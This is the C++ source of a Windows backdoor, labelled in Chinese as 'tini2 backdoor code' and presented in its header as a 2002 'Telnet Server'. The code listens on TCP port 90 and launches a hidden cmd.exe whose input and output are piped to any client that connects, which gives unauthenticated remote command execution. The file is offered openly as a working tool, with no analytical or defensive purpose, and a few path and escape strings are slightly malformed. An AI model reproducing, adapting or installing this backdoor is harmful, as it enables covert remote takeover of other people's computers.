tini2后门代码
| //////////////////////////////////////////////////////////////////////////////// // // Telnet Server. // // File : Tini2.cpp // // Create at : 2002.3.28 // Create by : dancefire , refdom // Email : dangcefire@263.net , refdom@263.net // // If you modify the code, or add more functions, please email me a copy. // ////////////////////////////////////////////////////////////////////////////////
#include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "kernel32.lib")
#define PORT 90
SOCKET ServerSocket = INVALID_SOCKET; SOCKET ClientSocket = INVALID_SOCKET; HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile; u_char varA,varB;
DWORD WINAPI ThreadFuncA( LPVOID lpParam ) { SECURITY_ATTRIBUTES pipeattr; DWORD nByteToWrite, nByteWritten; char recv_buff[1024];
pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES); pipeattr.lpSecurityDescriptor = NULL; pipeattr.bInheritHandle = TRUE; CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0);
varA = 1; while(true) { Sleep(250); nByteToWrite = recv(ClientSocket, recv_buff, 1024, 0); WriteFile(hWriteFile, recv_buff, nByteToWrite, &nByteWritten, NULL); } return 0; }
DWORD WINAPI ThreadFuncB( LPVOID lpParam ) { SECURITY_ATTRIBUTES pipeattr; DWORD len; char send_buff[25000];
pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES); pipeattr.lpSecurityDescriptor = NULL; pipeattr.bInheritHandle = TRUE;
CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0);
varB = 1; while (true) { ReadFile(hReadFile, send_buff, 25000, &len, NULL);
send(ClientSocket, send_buff, len, 0); } return 0; }
void main(void) { WSADATA WSAData; struct sockaddr_in RemoteAddr; int nRetCode; DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0; OSVERSIONINFO osvi; PROCESS_INFORMATION processinfo; STARTUPINFO startinfo;
WSAStartup(MAKEWORD(2,2),&WSAData); ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); RemoteAddr.sin_family = AF_INET; RemoteAddr.sin_port = htons(PORT); RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr)); listen(ServerSocket, 5);
varA = 0; varB = 0; CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA); CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);
do{ Sleep(250); }while((varA || varB) == 0);
GetStartupInfo(&startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; startinfo.hStdInput = hReadPipe; startinfo.hStdError = hWritePipe; startinfo.hStdOutput = hWritePipe; startinfo.wShowWindow = SW_HIDE;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi); char szAPP[256]; GetSystemDirectory(szAPP,MAX_PATH+1);
if(osvi.dwPlatformId == 2) { strcat(szAPP,"//cmd.exe"); if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo, &processinfo) == 0) { printf ("CreateProcess Error!/n"); return; } } else { strcat(szAPP,"//command.exe"); CreateProcess(NULL, szAPP, 0, 0, true, 0, 0, 0, &startinfo, &processinfo); }
while (true) { ClientSocket = accept(ServerSocket, NULL, NULL); Sleep(250); } }
|
|